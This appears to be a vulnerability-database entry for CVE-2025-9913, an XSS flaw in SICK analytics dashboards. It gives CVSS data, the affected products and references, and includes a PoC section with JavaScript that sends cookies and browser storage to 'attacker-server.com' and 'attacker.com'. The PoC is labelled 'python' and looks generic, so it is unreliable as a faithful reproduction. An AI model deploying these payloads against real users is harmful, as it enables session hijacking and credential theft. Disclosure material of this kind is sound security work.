CVE-2025-9913

Description

JavaScript can be ran inside the address bar via the dashboard "Open in new Tab" Button, making the application vulnerable to session hijacking.

CVSS Details

CVSS Score

4.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sick:baggage_analytics:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:sick:logistic_diagnostic_analytics:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:sick:package_analytics:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:sick:tire_analytics:*:*:*:*:*:*:*:* - VULNERABLE

SICK相关产品（具体版本信息请参考SICK官方CSAF公告 sca-2025-0010）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-9913 PoC: JavaScript Injection via Dashboard "Open in new Tab" Button -->
<!-- This PoC demonstrates how javascript: URI can be injected through the dashboard's "Open in new Tab" functionality -->

<!-- Malicious link that exploits the vulnerability when clicked via "Open in new Tab" -->
<a href="javascript:void((function(){
    // Steal session cookie and send to attacker server
    var sessionData = document.cookie;
    var img = new Image();
    img.src = 'https://attacker-server.com/steal?data=' + encodeURIComponent(sessionData);
    
    // Also steal localStorage/sessionStorage tokens
    var localData = JSON.stringify({
        localStorage: localStorage,
        sessionStorage: sessionStorage,
        cookies: document.cookie
    });
    
    // Exfiltrate via fetch
    fetch('https://attacker-server.com/exfil', {
        method: 'POST',
        body: localData,
        headers: {'Content-Type': 'application/json'}
    });
})())">
    Click to Open Dashboard
</a>

<!-- Alternative: Direct javascript: payload for address bar execution -->
<!-- javascript:void(document.location='https://attacker.com/steal?c='+document.cookie) -->

<!-- 
 * Attack Flow:
 * 1. Attacker with high privileges crafts malicious javascript: URI
 * 2. Victim clicks "Open in new Tab" on dashboard
 * 3. JavaScript executes in the context of the dashboard application
 * 4. Session cookies/tokens are exfiltrated to attacker's server
 * 5. Attacker uses stolen session to hijack victim's session
 */

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-9913
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-9913
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-9913/
[4] VulDB https://vuldb.com/cve/CVE-2025-9913
[5] https://sick.com/psirt
[6] https://www.cisa.gov/resources-tools/resources/ics-recommended-practices
[7] https://www.first.org/cvss/calculator/3.1
[8] https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json
[9] https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf
[10] https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-9913", "sourceIdentifier": "[email protected]", "published": "2025-10-06T07:15:36.200", "lastModified": "2026-01-29T01:55:44.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "JavaScript can be ran inside the address bar via the dashboard \"Open in new Tab\" Button, making the application vulnerable to session hijacking."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N", "baseScore": 4.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sick:baggage_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "E62416BA-1BF1-43BD-98B2-57BD34128419"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:logistic_diagnostic_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "27031959-2981-4755-9E3D-02CD083F2B72"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:package_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "5955214B-0D71-449A-BFD4-8804FDF91CA1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:tire_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "86C0BA69-E701-45A3-ADA5-130B8AD9DF15"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}